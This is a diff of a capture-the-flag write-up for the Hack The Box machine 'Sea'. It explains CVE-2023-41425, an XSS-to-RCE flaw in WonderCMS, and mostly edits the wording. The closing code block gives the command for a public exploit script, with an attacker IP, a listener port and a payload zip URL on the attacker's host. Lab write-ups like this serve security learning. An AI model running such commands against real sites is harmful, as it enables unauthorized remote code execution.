Z4kr-Sec/z4kr-sec.github.io/content/HTB/Easy/Sea-HTB.md

 - **CVE-2023-41425** - *WonderCMS* Cross-Site Scripting (XSS) leading to Remote Code Execution (RCE)

 This vulnerability affects **WonderCMS** versions **3.2.0 through 3.4.2**.
-The vulnerability lies in the installModule component of WonderCMS, where user inputs are not adequately sanitized before being processed.
+The vulnerability lies in the `installModule` component of WonderCMS, where user inputs are not adequately sanitized before being processed.

-To make the exploit work the attacker should either be authentificated or somehow make an authentificated usr to execute the code.
-In the case of the machine there ir a bot that triggers this action.
+For the exploit to work, the attacker must either be authenticated or trick an authenticated user into executing the malicious code.
+In this case, the machine uses a bot that automatically triggers the action.

 ## Exploitation

-Upon using a python exploit script from [GitHub](https://github.com/insomnia-jacob/CVE-2023-41425),the script required specifying the URL, attacker IP, attacker port, and the path to the payload zip file:
+Using a Python 3 exploit script from [GitHub](https://github.com/insomnia-jacob/CVE-2023-41425), the script required specifying the URL, attacker IP, attacker port, and the path to the payload zip file:

 ```bash
 python3 exploit.py -u http://sea.htb/loginURL -i 10.10.14.4 -p 1234 -r http://10.10.14.4/main.zip